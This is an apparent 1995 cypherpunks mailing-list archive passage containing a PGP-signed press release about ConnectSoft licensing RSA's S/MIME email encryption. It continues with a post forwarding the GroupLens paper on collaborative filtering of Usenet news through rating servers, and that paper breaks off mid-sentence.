Message-ID: <01HTC7Y9RXO28WW6NV@MAILSRV1.PCY.MCI.NET> -----BEGIN PGP SIGNED MESSAGE----- Date: Tuesday, 25-Jul-95 07:26 AM ConnectSoft Licensing Agreement with RSA Data Security Includes Revolutionary S/ MIME Technology; ConnectSoft's early BELLEVUE, WASH. (July 24) BUSINESS WIRE -July 24, 1995--ConnectSoft, Inc., provider of the most powerful, easy-to-use interfaces to digital communication and commerce, announced today it has licensed a new interoperable security technology from RSA that will provide ConnectSoft customers with added privacy and security to their daily communications. The agreement gives ConnectSoft products compliancy with the S/MIME specification (Secure Multipurpose Internet Mail Extension) that ensures a customer's e-mail is read only by the designated recipient -- regardless of the e-mail platform they are using. The new security features will be included in the newest versions of ConnectSoft's E-Mail Connection(tm) and Internet Connection(tm) products that will be released this fall. "In today's networked world, security is a growing concern as we rely on e-mail for more of our day-to-day communications," said Bob Dickinson, ConnectSoft's vice president and general manager, Consumer Online Products & Services division. "Our arrangement with RSA provides encryption and authentication technologies giving our customers the most protected and secure communication available today." The S/MIME specification is based on the popular Internet MIME standard and allows a customer's S/MIME message to be composed and encrypted on one vendor's system and be successfully received and decrypted on a different one. The specification also uses the intervendor PKCS (Public Key Cryptography Standards), the most widely implemented commercial standard for public-key cryptography in North America. Global Security Standard - ------------------------ Encryption and authentication have been viewed as crucial enabling technologies for electronic commerce on the World Wide Web -- but encryption has been slow to come to e-mail, with most packages offering nothing at all. "ConnectSoft's early support of S/MIME demonstrates its commitment to provide customers with secure digital communication as well as its sophistication in developing future electronic commerce solutions," said Jim Bidzos, RSA president. According to RSA, a global security standard is essential for the development of a global digital economy. "If one public-key system is used everywhere for authentication, then signed digital documents can be exchanged between users in different countries using different software on different platforms," Bidzos said. "This interoperability is necessary for a true digital economy to develop." RSA Data Security is the world's "brand name" for cryptography, with more than 12 million copies of its software encryption and authentication installed and in use worldwide. RSA is part of existing and proposed standards for the Internet, CCITT, ISO, ANSI, IEEE and business and financial networks around the globe. The company develops and markets platform-independent developers kits, end user products, and provides comprehensive cryptographic consulting services. Founded in 1982 by the inventors of the patented RSA Public Key Cryptosystem, the company is headquartered in Redwood City, California. ConnectSoft is a privately held company based in Bellevue, Wash. It was founded in January 1988 and operates three divisions -- Consumer Online Products and Services, Commercial Software Development Services and Commercial Network Services -- targeted at providing customers with innovative products, custom software and network services for conducting digital commerce. The Consumer Online Products division markets the company's award winning products, such as E-Mail Connection, Internet Connection and KidMail Connection. The Commercial Software Development Services division develops custom software which enables secure, digital communications, commercial transactions, and Integrated Logistics Systems for Fortune 1000 companies such as United Parcel Service (UPS). The recently formed Commercial Network Services division will provide high bandwidth, high-quality commercial Internet and TCP/IP services to large- and medium-sized companies throughout the United States. -0- E-Mail Connection and Internet Connection are registered trademarks of ConnectSoft, Inc. Other company, brand product and service names may be trademarks or registered marks of their respective holders. - --30--KS/se* CONTACT: Kaufer Miller Communications David Kaufer, Tamese Robinson or Michele Ruegg 206/450-9965 MCI Mail: 576-6983 OR ConnectSoft, Inc. Linda Coyle, 206/827-6467 Ext. 5409 Internet: lindacconnectsoft.com KEYWORD: WASHINGTON INDUSTRY KEYWORD: COMPUTERS/ELECTRONICS COMED PRODUCT INTERACTIVE/MULTIMEDIA REPEATS: New York 212-575-8822 or 800-221-2462; Boston 617-330-5311 or 800-225-2030; SF 415-986-4422 or 800-227-0845; LA 310-820-9473 BW URL: http://www.hnt.com/bizwire * * * END OF STORY * * * -----BEGIN PGP SIGNATURE----- Version: 2.61 iQEVAwUBMBYw0SgP1O9KJoPBAQEnbgf/Xh1RmNq+TRp0x/owRZuJOi/ThSanerkA O59761UffY+syiO9RNeM02imGIn32cvEO2c1ud/nwgIxiPdSeQK4LN41r2fu9xmu OCKgA9jjtMysiFyMYLaeyRXGfvlIoPatTZDQ4e153Gjq0iex2Ely5Ft+KYFgjA0g ysFKf5U7qMfV2nmVExxe7FM/Ou3MsT98E7V44A9auzEEPIqN1bnG/t8hzBgCdb01 U9ywG3HVKDUANSeWpFTLFMqi4inr67/XozXSYBcmyO7xS+pVw92svlrywIs9TVXw 8ejnOQs9pQyKp6M2XJzdIj5nZE7a8EXyBL9A3PBNPFBpztpUa+c5mA== =kOS6 -----END PGP SIGNATURE----- ********************************************* * / Only God can see the whole * * O[%\%\%{<>===========================- * * \ Mandlebrot Set at Once! * * amp * * <0003701548 at mcimail.com> * * * ********************************************* Key fingerprint = A7 97 70 0F E2 5B 95 7C DB 7C 2B BF 0F E1 69 1D From vznuri at netcom.com Wed Jul 26 17:40:35 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Wed, 26 Jul 95 17:40:35 PDT Subject: "grouplens": reputation system, groupware, etc. Message-ID: <199507270038.RAA04789@netcom4.netcom.com> Hello cpunks, this strikes me as a very visionary proposal for changing the underlying news infrastructure approach. It refers to the idea of "ratings servers" (it would be interesting to trace the origination of the term). I think the ideas are very malleable and may become a powerful force for future cyberspace communities. We are just now witnessing the birth of reputation systems in cyberspace. I think they will eventually become one of its most important features. For any cpunks with interests in investing your time in world-changing technologies, this would be at the top of *my* list. There are very difficult logistical problems to overcome, but this "second generation of communication" will IMHO be a key requirement of developing actual communities in cyberspace. ~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^ \ / ~/ |\| | | |> | : : : : : : Vladimir Z. Nuri : : : : \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html X-within-URL: http://www-sloan.mit.edu/ccs/CCSWP165.html GROUPLENS: AN OPEN ARCHITECTURE FOR COLLABORATIVE FILTERING OF NETNEWS Paul Resnick*, Neophytos Iacovou**, Mitesh Suchak*, Peter Bergstrom**, John Riedl** * MIT Center for Coordination Science Room E53-325 50 Memorial Drive Cambridge, MA 02139 617-253-8694 Email: presnick at mit.edu ** University of Minnesota Department of Computer Science Minneapolis, Minnesota 55455 (612) 624-7372 Email: riedl at cs.umn.edu From Proceedings of ACM 1994 Conference on Computer Supported Cooperative Work, Chapel Hill, NC: Pages 175-186 Copyright �1994, Association for Computing Machinery _________________________________________________________________ ABSTRACT Collaborative filters help people make choices based on the opinions of other people. GroupLens is a system for collaborative filtering of netnews, to help people find articles they will like in the huge stream of available articles. News reader clients display predicted scores and make it easy for users to rate articles after they read them. Rating servers, called Better Bit Bureaus, gather and disseminate the ratings. The rating servers predict scores based on the heuristic that people who agreed in the past will probably agree again. Users can protect their privacy by entering ratings under pseudonyms, without reducing the effectiveness of the score prediction. The entire architecture is open: alternative software for news clients and Better Bit Bureaus can be developed independently and can interoperate with the components we have developed. KEYWORDS: Collaborative filtering, information filtering, electronic bulletin boards, social filtering, Usenet, netnews, user model, selective dissemination of information. INTRODUCTION Computer networks allow the formation of interest groups that cross geographical barriers. Bulletin boards have been an important mechanism for that. Rather than addressing an article directly to a known set of people, the writer posts it in a newsgroup, a public place available to anyone interested in the topic. The Usenet netnews system creates the illusion of a single bulletin board available anywhere in the world. It propagates articles so that, with some delays, an article posted from anywhere in the world is available to everyone else. Permission to copy without fee all or part of this material is granted provided that the copies are not made or distributed for commercial advantage, the ACM copyright notice and the title of the publication and its date appear, and notice is given that copying is by permission of the Association for Computing Machinery. To copy otherwise, or to republish, requires a fee and/or specific permission. Recent counts indicate that there are more than 8000 newsgroups, with an average traffic of more than 100 MB per day[1]. The newsgroups carry announcements, questions, and discussions. In a discussion, often called a thread, one article induces replies from several others, each of which may also induce replies. The January 24, 1994 estimates of netnews participation indicate that more than 140,000 people posted articles in the previous two weeks. There are many more "lurkers" who read but do not post articles. Clearly, a lot of people are getting value from these bulletin boards. In fact, netnews' rapid broadcast nature and widespread readership has reshaped the way the computing community works. System administrators depend on netnews to keep in touch with the latest development work, the latest security holes, and the latest bug fixes. Researchers depend on netnews as a way of keeping up-to-date on new research directions and important results in between conferences. Many others use netnews just to keep in touch with other people around the world, to learn about new books, new recipes, new music, and what life in other cities is like. Over the years netnews has become a principal medium for sharing among computer users. Even so, the experience of using netnews is not completely satisfying. Almost everyone complains that the signal to noise ratio is too low. Writers cannot easily tell whether their comments are valued, except by the vocal few who post responses. Some seem not to care about reader interest, only about their own right to write. Moreover, tastes differ, so that no one article will appeal to all the readers of a newsgroup. Each reader ends up sifting through many news articles to find a few valuable ones. Often, readers find the process too frustrating and stop reading netnews altogether. Netnews provides two mechanisms that help readers limit their attention to articles likely to interest them. First, the division of the bulletin board into newsgroups allows readers to focus on a few topics. When the number of postings in a newsgroup gets too large, it is often split into two or more newsgroups with identifiable subtopics. Second, some newsgroups are moderated. Attempted postings to these newsgroups are automatically forwarded to the moderator, who decides whether or not they belong in the newsgroup. Usenet propagates only those articles that receive the moderator's stamp of approval. In addition, software packages for reading netnews (hereafter referred to as news clients) provide other mechanisms that ease readers' burdens. First, most news clients display a summary of the author and subject line for each message in a newsgroup. The user then indicates which articles she would like to read. Second, most news clients display all of the articles in a particular discussion thread together. Some initially show only the first article in each thread, allowing users to quickly peruse the current discussion topics. Third, some news clients provide "kill files." A kill file identifies text strings that are not interesting to a particular user. If a user puts the subject line of an article into the kill file, no further articles on that subject will be displayed. If a user puts the author's name into a kill file, no further articles from that author will be displayed. Finally, some news readers provide string search facilities. If the user is particularly interested in articles that mention "collaborative filtering," the news client can find them. GroupLens provides a new mechanism to help focus attention on interesting articles. It draws on a deceptively simple idea: people who agreed in their subjective evaluation of past articles are likely to agree again in the future. After reading articles, users assign them numeric ratings. GroupLens uses the ratings in two ways. First, it correlates the ratings in order to determine which users' ratings are most similar to each other. Second, it predicts how well users will like new articles, based on ratings from similar users. The heart of GroupLens is an open architecture that includes news clients for entry of ratings and display of predictions, and rating servers for distribution of ratings and delivery of predictions. Related Work The general problems of information overload and low signal to noise ratio have received considerable attention in the research literature. We use the term information filtering generically to refer both to finding desired information (filtering in) and eliminating that which is undesirable (filtering out), but related work also appears under the labels of information retrieval and selective dissemination of information [2]. In addition, research on agents [12, 13], user modeling [1, 9], knowbots [8], and mediators [21] has explored semi-autonomous computer programs that perform information filtering on behalf of a user. Malone et al. [13] describe three categories of filtering techniques, cognitive, social, and economic, based on the information sources the techniques draw on in order to predict a user's reaction to an article. The three categories provide a useful road map to the literature. Cognitive, or content-based filtering techniques select documents based on the text in them. For example, the kill files and string search features provided by news clients perform content filtering. Even the division of netnews into newsgroups is a primitive example, since a reader restricts his attention to those articles with a particular text string in their "newsgroup:" field. Other content-based filtering techniques could potentially be used as well. The profile of which texts to include or kill could be more complex than a collection of character strings. For example, strings could be combined with the Boolean operators AND, OR, and NOT. Alternatively, the profile could consist of weight vectors, with the weights expressing the relative importance of each of a set of terms [4, 5, 16]. Some content filtering techniques update the profiles automatically based on feedback about whether the user likes the articles that the current profile selects. Information retrieval research refers to this process as relevance feedback [17]. The techniques for updating can draw on Bayesian probability [2], genetic algorithms [18], or other machine learning techniques. Social filtering techniques select articles based on relationships between people and on their subjective judgments. Placing an author's name in a kill file is a crude example. More sophisticated techniques might also filter out articles from people who previously co-authored papers with the objectionable person. Collaborative filtering, based on the subjective evaluations of other readers, is an even more promising form of social filtering. Human readers do not share computers' difficulties with synonymy, polysemy, and context when judging the relevance of text. Moreover, people can judge texts on other dimensions such as quality, authoritativeness, or respectfulness. A moderated newsgroup employs a primitive form of collaborative filtering, choosing articles for all potential readers based on evaluations by a single person, the moderator. The Tapestry system [6] makes more sophisticated use of subjective evaluations. Though it was not designed to work specifically with netnews, it allows filtering of all incoming information streams, including netnews. Many people can post evaluations, not just a single moderator, and readers can choose which evaluators to pay attention to. The evaluations can contain text, not just binary accept/reject recommendations. Moreover, filters can combine content-based criteria and subjective evaluations. For example, a reader could request articles containing the word "CSCW" that Joe has evaluated and where the evaluation contains the word, "excellent". Our work is similar in spirit to Tapestry but extends it in two ways. First, Tapestry is a monolithic system designed to share evaluations within a single site. We share ratings between sites and our architecture is open to the creation of new news clients and rating servers that would use the evaluations in different ways. Second, Tapestry does not include any aggregate queries. The rating servers we have implemented aggregate ratings from several evaluators, based on correlation of their past ratings. A reader need not know in advance whose evaluations to use and in fact need not even know whose evaluations are actually used. In GroupLens, ratings entered under a pseudonym are just as useful as those that are signed. Maltz has developed a system that aggregates all ratings of each netnews article, determining a single score for each [14]. By contrast, GroupLens customizes score prediction to each user, thus accommodating differing interests and tastes. In return for its reduced functionality, Maltz's scheme scales better than ours, because rating servers can exchange summaries of several users' ratings of an article, rather than individual ratings. The subjective evaluations used in collaborative filtering may be implicit rather than explicit. Read Wear and Edit Wear [7] guide users based on other users' interactions with an artifact. The GroupLens news clients monitor how long users spend reading each article but our rating servers do not yet use that information when predicting scores. Economic filtering techniques select articles based on the costs and benefits of producing and reading them. For example, Malone argues that mass mailings have a low production cost per addressee and should therefore be given lower priority. Applying this idea to netnews, a news client might filter out articles that had been cross-posted to several newsgroups. More radical schemes could provide payments (in real money or reputation points) to readers to consider articles and payments to producers based on how much the readers liked the articles. Stodolsky has proposed a scheme that combines social and economic filtering techniques [19]. He proposes on-line publications where the publication decision ultimately rests with the author. During a preliminary publication period, other readers may post ratings of the article. The author may then withdraw the article, to avoid the cost to his reputation of publishing an article that is disliked. Outline The GROUPLENS section of the paper describes the GroupLens architecture and its evolution. The ONGOING EXPERIMENTATION section describes a larger scale test of the architecture that is in preparation. The SOCIAL IMPLICATIONS section addresses social changes in the use of Netnews that may be precipitated by GroupLens. GROUPLENS GroupLens is a distributed system for gathering, disseminating, and using ratings from some users to predict other users' interest in articles. It includes news reading clients for both Macintosh and Unix computers, as well as "Better Bit Bureaus," servers that gather ratings and make predictions. Both the overall architecture and particular components have evolved through iterative design and pilot testing to meet the following goals: Openness: There are currently dozens of news clients in common use, each with a strong following among its user community. Any or all of these clients can be adapted to participate in GroupLens. GroupLens also allows for the creation of alternative Better Bit Bureaus that use ratings in different ways to predict user interest in news articles. Ease of Use: Ratings are easy to form and communicate, and predictions are easy to recognize and interpret. This minimizes the additional burden that collaborative filtering places on users. Compatibility: The architecture is compatible with existing news mechanisms. Compatibility reduces user overhead in taking advantage of the new tool, and simplifies its introduction into netnews. Scalability: As the number of users grows, the quality of predictions should improve and the speed not deteriorate. One potential limit to growth will be transport and storage of the ratings, if GroupLens grows very large. Privacy: Some users would prefer not to have others know what kinds of articles they read and what kinds they like. The Better Bit Bureaus in GroupLens can make effective use of ratings even if they are provided under a pseudonym. Overview Usenet consists of Internet sites as well as UUCP sites. Typically a site will declare a machine to act as its news server. Users at each site invoke news clients on their computers and connect to the news server in order to retrieve news articles. Users can also write new articles and post them to the news server through their news clients. When a user posts an article, it travels from the news client where the article is composed to the local news server and from there to news servers at nearby sites. After leaving the originating site, an article propagates throughout Usenet, hopping from site to site. Since there is no centralized coordination of the distribution process, an article may arrive at a site via more than one route. Because articles have globally unique identifiers, however, and are never altered once they are posted, any site can recognize a duplicate copy of an article and avoid passing it on. Lotus Notes uses a similar distribution process [10]. The netnews architecture is summarized in Figure 1. GroupLens adds one new type of entity to the netnews architecture, Better Bit Bureaus, as shown in Figure 2. The Better Bit Bureaus provide scores that predict how much the user will like articles, and gather ratings from news clients after the user reads the articles. The Better Bit Bureaus also use special newsgroups to share ratings with each other, to allow collaborative filtering among users at different sites. The remainder of this section traces the processes of rating creation, distribution, and use and describes how they meet [IMAGE] Figure 1: The netnews architecture. News articles hop from news server to news server. A news client connects to the news server at its site and presents articles to users. [INLINE] Figure 2: The GroupLens architecture. Better Bit Bureaus collect ratings from clients, communicate them by way of news servers, and use them to generate numeric score predictions that they send to clients. Clients connect to a local news server, and can connect to a Better Bit Bureau that uses the same or a different news server.the design goals of openness, ease of use, compatibility, scalability, and privacy. Entering Ratings In GroupLens, a rating is a number from 1 to 5, optionally supplemented by the number of seconds which the user spent reading the article. Users are encouraged to assign ratings based on how much they liked the article, with 5 highest and 1 lowest. The user chooses a pseudonym to associate with her ratings that may be different from the name she uses for posting news articles. This preserves the ability to detect that two ratings came from the same person, while preventing detection of exactly who that person is. The GroupLens choice of the form and meaning of ratings is only one possibility in a rich design space. There are many possible dimensions along which to rate articles: interest in subject, quality of writing, authoritativeness of the author, etc. Rather than a single composite rating, separate ratings on several dimensions could be solicited from readers. Free text ratings could be entered rather than numbers. Readers could be asked to predict how well they think other readers will like an article rather than report how much they themselves liked it. Ratings could be restricted only to positive, or only to negative evaluations. The degree of privacy could also be varied, from completely anonymous to authenticated signatures. In fact, an earlier implementation of a Macintosh news client [20] employed ratings with quite a different form than the current GroupLens architecture. Users entered only endorsements, positive ratings, on the assumption that since the signal to noise ratio in netnews is so low it is only important to point out the good articles. Readers endorsed articles that they thought others in a known small group would like. Finally, readers signed endorsements with their real names, allowing other people to select all the articles endorsed by a particular friend. A pilot test of that earlier endorsement mechanism at a Schlumberger research lab indicated that a group of seven people may not be large enough to get the full available benefit of collaborative filtering. As we contemplated a much larger group size, we believed that some users would be less willing to sign their ratings and that it would become increasingly difficult for users to know what articles others in the group would like. The pilot test also reinforced the importance of making it as easy as possible to enter endorsements. To make an endorsement, a user had to select from a pull-down menu, wait for a window to open up, optionally enter text in the window, and then close it. While the whole process took only a matter of seconds if the user entered no text, it was still significantly longer than it normally takes to go on to the next article. We have taken care in the GroupLens system to make entry of ratings as easy as possible. We have modified three news clients, Emacs Gnus and NN for UNIX machines and NewsWatcher for Macintoshes. In each case, entry of a [IMAGE] Figure 3. Reading an article with the modified NewsWatcher client. The user can click on one of the five ratings buttons with the mouse, or type a number from 1 to 5 on the keyboard. rating fits into the overall paradigm of the news client. For example, in the modified NewsWatcher, the numbers 1 to 5 appear as selectable buttons any time a user reads an article (Figure 3), and the user can also type a number as a keyboard shortcut for those buttons. In Gnus, no buttons are displayed, but readers still type the ratings directly. With NN, readers first type the letter `v' (to enter into "rating mode") and then the rating. The GroupLens architecture requires only that ratings be reported on a 1 to 5 scale, not that they be displayed by news clients on that scale. To make the rating scale easy for students to understand, the NN and Gnus clients accept letter grades rather than numbers. When reporting the ratings to the Better Bit Bureau, they translate `a' to 5, `b' to 4 and so on. Other news clients could allow more gradations of ratings (e.g., 1 to 100) and report them as fractions between 1 and 5. Distributing Ratings GroupLens does not interfere with the Usenet propagation scheme at all. On the contrary, it relies upon it heavily. The Better Bit Bureau packages one or more ratings into a news article, following the format in Figure 4, and posts it to a news server. This allows GroupLens to take advantage of the Usenet propagation scheme. Over the years Usenet has demonstrated its ability to propagate articles to every other Usenet site, even as the number of news servers has grown dramatically. Rating servers could exchange ratings directly, through internet or UUCP links, but they would have to reimplement many of the propagation features already found in Usenet. The message format we have defined allows several ratings to be batched in a single article. Each rating is just one line of text, while each Usenet netnews article requires several lines of headers. Thus, packaging several ratings in one article can save a considerable amount of overhead. Our Better Bit Bureaus (BBBs) batch at the session level (i.e., all ratings entered by a user during a reading session go into one ratings article). Other batching policies, such as all ratings from a site over the last hour, could be implemented. Ratings are posted in newsgroups dedicated solely to ratings articles. One natural configuration is to set up a parallel "ratings transport" newsgroup for each "normal" Usenet group. One deficiency of this approach is that if a rating article contains several ratings, it may have to be cross-posted to many ratings newsgroups. Another deficiency is that it requires news servers to carry a large number of new newsgroups devoted solely to ratings, which may increase administrative overhead. Currently, our BBBs post all ratings in a single newsgroup. To facilitate the initial spread of GroupLens, users can participate even if their local news servers do not carry the ratings newsgroup and even if their local site administrators have not set up Better Bit Bureaus. The GroupLens architecture permits this by allowing users to connect to a remote BBB. The left side of Figure 2 illustrates a local BBB that posts ratings articles to the same news server that the clients connect to. The right side of Figure 2 illustrates a client connecting to a remote BBB that propagates ratings articles through a different news server. Predicting Scores The Better Bit Bureaus (BBBs) predict how much readers will like articles. While content filters would make predictions based on the presence or absence of words in the articles, the BBBs in GroupLens use the opinions of other people who have already rated the articles. If no one has read an article, the BBBs are unable to make predictions about it. When ratings for an article are available, they are unlikely to be uniform, due to differences of opinion and goals among the raters. A BBB combines the different ratings to produce a predicted score. Moreover, additional readers are likely to have different opinions about the article. A BBB thus might use the same ratings to predict different scores for different readers, by changing the relative weight given to the ratings. When predictions are on the same scale as ratings, prediction can be modeled as matrix filling, where the columns are people, the rows are articles, and the cells contain the ratings that people have posted, as shown in Figure 5. Many of the cells of the matrix are empty, because readers have not yet examined those articles or have elected not to rate them. A BBB predicts scores for missing cells before the readers examine the corresponding articles. From: MIT GroupLens Better Bit Bureau Subject: Ratings; please ignore Message-ID: <771185369 at guilder.mit.edu> Groups_Rated: news.adin.policy, news.groups Raters: [Pseudo1] [Pseudo1] 1 12 news.adin.policy [Pseudo1] 2 7 news.groups Figure 4: A sample ratings article. Each line in the body of the article contains a rating of one article by one person. The five fields on each line are the id of the article, the pseudonym of the rater, a rating, the number of seconds the reader spent examining the article before rating it, and the newsgroups the article is in. The time count is optional. Additional keyword identified fields can also be included at the end of line. [IMAGE] Figure 5: a sample matrix of ratings. All the scoring methods we have implemented are based on the heuristic that people who agreed in the past are likely to agree again, at least on articles in the same newsgroup. This heuristic will mislead on occasion, but preferences for most kinds of articles are likely to be fairly stable over time. To implement this heuristic, our BBBs first correlate ratings on previous articles to determine weights to assign to each of the other people when making predictions for one of them. Then, they use the weights to combine the ratings that are available for the current article. We have investigated several techniques for correlating past behavior and using the resultant weights, based on reinforcement learning [12], multivariate regression, and pairwise correlation coefficients that minimize linear error or squared error. We illustrate one of the correlation and prediction techniques by computing Ken's predicted score on article 6, the last row of the matrix. First, we compute correlation coefficients [15], weights between -1 and 1 that indicate how much Ken tended to agree with each of the others on those articles that they both rated. For example, Ken's correlation coefficient with Lee is computed as: [IMAGE] In the formula above, [INLINE] is the average of Ken's ratings. All the summations and averages in the formula are computed only over those articles that Ken and Lee both rated. We have conveniently arranged for [INLINE] and [INLINE] to be 3 in this example, but that need not be true in practice. Similarly, Ken's correlation coefficient with Meg is +1 and with Nan is 0. That is, Ken tends to disagree with Lee ( [INLINE] ) and agree with Meg ( [INLINE] ). His ratings are not correlated with Nan's. To predict Ken's score on the last article in the matrix, take a weighted average of all the ratings on article 6 according to the following formula: [IMAGE] This is a reasonable prediction for Ken, since the article received a high rating from someone who agreed with him in the past and a low rating from someone who disagreed. Carrying through similar calculations for Nan yields a lower prediction of 3.75. Since Nan had partial agreement with Lee in the past, Lee's low rating for the article partially cancels out the high ratings that Meg gave it. The score prediction system is robust with respect to certain differences of interpretation of the rating scale. If two users are perfectly correlated, but one user gives only scores between 3 and 5 and the other only scores between 1 and 3, a 5 score from the first user will result in a prediction of 3 for the second. If two users would be perfectly correlated, but the first mistakenly thinks 1 is a good score and 5 is bad, the two will be negatively correlated and a 1 score from the first will result in a prediction of 5 for the second. This leads to a clear explanation to the user of how to assign ratings: assign the rating you wish GroupLens had predicted for this article. Allen's study of five subjects' preferences for newswire articles [1] found very small correlations between subjects, thus calling into question our basic assumption that people who agreed in the past are likely to agree again. It may be, however, that a larger sample of subjects would have yielded some pairs with larger overlaps in their ratings. More importantly, it may be that pairs of people will share interests in some topics but not others. Two people may agree in their evaluations of technical articles, but not jokes. Our BBBs keep separate rating matrices for each newsgroup. One hopes that the accuracy of the predictions improve as the BBB has more past ratings to use in computing correlations. Four people at the University of Minnesota participated in a pilot test of an earlier version, using a slightly different scoring function. While all four participants reported that the predicted scores eventually matched their interests fairly closely, they did observe that there was a start-up interval before the predictions were very useful. Further experiments and analysis are necessary to determine just how long the start-up interval is likely to be for each new user. It seems likely that better scoring mechanisms can be developed. In addition to better matrix filling techniques, it may be helpful to use both others' ratings and the contents of articles in making predictions. It may also be helpful to take into account the time people spent reading articles before rating them, information collected but not used by our BBBs. Fortunately, the GroupLens architecture is open: anyone can implement an alternative BBB so long as it posts ratings articles in the format described above and communicates with clients the same way that our BBBs do. We hope that the development of alternative BBBs will become an active area for future research. As we describe below, our next pilot test should yield rating sets that we will make available to others who wish to evaluate alternative scoring algorithms. Using Ratings It is up to the news client how best to use the scores generated by a BBB. Some may filter out those articles with scores below a threshold. Some may sort the articles based on the scores. Others may simply display the scores, numerically or graphically. In keeping with the ease of use design goal, developers should modify each news client in a manner consistent with that client's overall design. One trend in news clients is to display a summary of the unread articles in a newsgroup. Each line of the summary contains information about one article, typically the author, the subject line and the length. A user browses the summary and requests display of the full text of those articles that seem interesting. All three of the news clients we modified use this display technique. The three modified clients we implemented make slightly different uses of the scores in the summary display. The modified NN client displays articles in the same order a regular NN client does, namely the order in which the articles arrived at the news server. It merely adds an additional column containing the predicted scores. In the first version of this client, the scores were displayed numerically. The modified Gnus client uses the predicted scores to alter the order of presentation of articles in the summary. Gnus clusters articles by thread. The modified Gnus client sorts the threads based on the maximum predicted score over the articles in the thread. Within each thread, however, articles are still displayed in chronological order, to preserve the flow of discussion. As in the modified NN, the scores are displayed in an additional column in the summary. The Minnesota pilot test included users of both the Gnus and NN clients. As expected, participants tended to believe that the sorting and display mechanisms of their own news reader were best, but all were glad to see the score predictions incorporated into that standard format. Several users, however, noticed that it was somewhat difficult to visually scan the predictions to find the high ones. A revised version of the NN client (Figure 6) rounds off to the nearest integer and reports that as a letter grade (A-E), a scale familiar to students at U.S. Universities. The modified NewsWatcher client displays the predicted scores as bar graphs rather than numbers (Figure 7), making it easier to visually scan for articles with high scores (longer bars). Otherwise, it follows the conventions of the original NewsWatcher client. Articles are grouped into threads and the summary display initially shows header lines only for the first article in each thread. Users can twist down the triangle associated with a thread to see the header lines for the rest of the articles. [IMAGE] Figure 6: The modified NN client. The third column displays the number of lines in the article. The fourth column displays the score predictions as letter grades, translated from the numeric predictions that the Better Bit Bureau makes (5=A, 4=B, etc.). When no one has evaluated an article, no prediction is made. [IMAGE] Figure 7: The modified NewsWatcher client displays predicted scores as bar graphs. Disclaimer: the scores were randomly generated for demonstration purposes. In practice, we would expect articles by Pete Bergstrom (one of the authors of this paper) to have much higher predicted scores. Scale Issues Further research is needed to understand how performance will change as the scale increases. In the case of GroupLens, there are several relevant performance measures: prediction quality, user time, Better Bit Bureau compute time and disk storage, and network traffic. The first measure is the quality of score predictions. We expect prediction quality to increase as the number of users increases, since more data will be available to the prediction algorithm. Another measure is how long users have to wait to post ratings and receive predictions. In an earlier version of GroupLens, the functions of the BBB were incorporated in the news client itself. One major advantage of the separate BBB is that it can pre-fetch ratings and pre-compute predictions rather than computing them when the user starts the news client. Thus, user time should remain roughly constant as GroupLens grows, even if it takes more CPU time to compute scores. For many possible prediction formulas CPU time will grow even faster than linearly with increases in the number of users. To reduce CPU time, BBBs could use only a part of the ratings matrix, trading off compute time against quality of predictions. Even though each rating is short, each news article might be read and rated by many raters, so the total volume of ratings could exceed the volume of news. To minimize storage requirements, BBBs may employ algorithms that use and discard ratings as they arrive, rather than storing them. Three basic techniques could reduce network traffic: reduce the size of the ratings, reduce the number of ratings, and reduce the number of places where each rating is sent. Our BBBs batch several ratings in a single article, a first step toward reducing the amount of storage per rating, but further compression is possible. The number of ratings could be reduced by limiting the total number of ratings per article or the number of ratings from users with similar profiles. The separation of the BBBs from the news clients in the GroupLens architecture reduces the number of destinations for each rating: each news client receives only score predictions rather than all the individual ratings that contribute to those predictions. The number of destinations for each rating could be further reduced by sending ratings to some BBBs but not others. For example, BBBs could be clustered, based on geography or interest, and exchange ratings only within clusters. The size of each cluster must be small enough to limit the amount of ratings information distributed, but large enough to provide an effective peer group. The table below estimates daily network traffic for various cluster sizes assuming each user rates 100 articles per day and each rating requires approximately 100 bytes. For comparison purposes, the current netnews traffic is around 100MB per day. Cluster size Daily ratings traffic 100 users 1 MB 10,000 users 100 MB 1,000,000 users 10 GB Summary of GroupLens Architecture The heart of GroupLens is an open architecture for distributing ratings. The architecture specifies the format of ratings produced in batches by BBBs, the propagation of the ratings by Usenet, and the interface for delivering predictions and ratings between news clients and BBBs. Otherwise, the architecture is completely open. BBBs and news clients can be freely substituted, providing an environment for experimentation in predicting ratings and in user interfaces for collecting ratings and presenting predictions. ONGOING EXPERIMENTATION Both of the previous pilot tests, at Schlumberger and the University of Minnesota, involved only local sharing of ratings. These tests led to improvements in both the overall architecture and the user interfaces of news clients, as discussed already. The next step is a larger scale, distributed test, that we plan to carry out this summer. We have established a newsgroup on the news servers at MIT and Minnesota and two (slightly different) Better Bit Bureaus that communicate ratings through that newsgroup. The test is not designed to demonstrate that people prefer to read netnews with our collaborative filters than without them. We believe that such an evaluation should wait for at least one more iterative design cycle. Rather, the goals are to identify any unexpected scaling issues that may arise and to gather a data set that will be useful in evaluating alternative score prediction algorithms. The primary benchmark of any algorithm's effectiveness will be its ability to predict values that have been deleted from a rating matrix. At first glance, it might seem that any large set of ratings would be useful in creating such a benchmark. Upon closer inspection, however, complete ratings matrices are much more valuable than sparse ones. For example, suppose that users read and rate only a small number of articles, based on score predictions they receive from BBB X. If users read different articles, this generates a sparse matrix of ratings. Now suppose that we wish to compare X to an alternative, Y, that predicts different scores for the users. We can compare Y's and X's predictions on those articles that users read, but the sample is biased. Perhaps with Y's scores, the users would have read other articles and liked them. To allow unbiased comparisons, we are asking each of the participants in the next pilot test to read and rate all the articles in a training set. The training set will contain a number of articles from each of the newsgroups that will be included in the test. Since users will contribute ratings under a pseudonym, we will be able to share the ratings in this training set with other researchers. In addition, we will retain the full texts of the articles in the training set. That will enable evaluation of BBBs that perform content filtering, or a combination of content filtering and collaborative filtering, as well as those that use only other users' ratings. SOCIAL IMPLICATIONS Collaborative filtering may introduce many social changes in the already rapidly evolving Netnews community. For example, the utility of moderated newsgroups may decline. New social patterns will have to develop to encourage socially beneficial behaviors, such as reviewing articles that have already received a few low ratings. Finally, if GroupLens is effective at creating peer groups with shared interests, will those peer groups be permeable or will the global village fracture into tribes? Changes to Netnews Behaviors GroupLens has the potential to change Netnews as we now know it. For one thing the quality of articles individual users choose to read should increase. More significantly, as more and more users rely on GroupLens the total number of low-quality articles on Usenet may decrease significantly. Since few people will 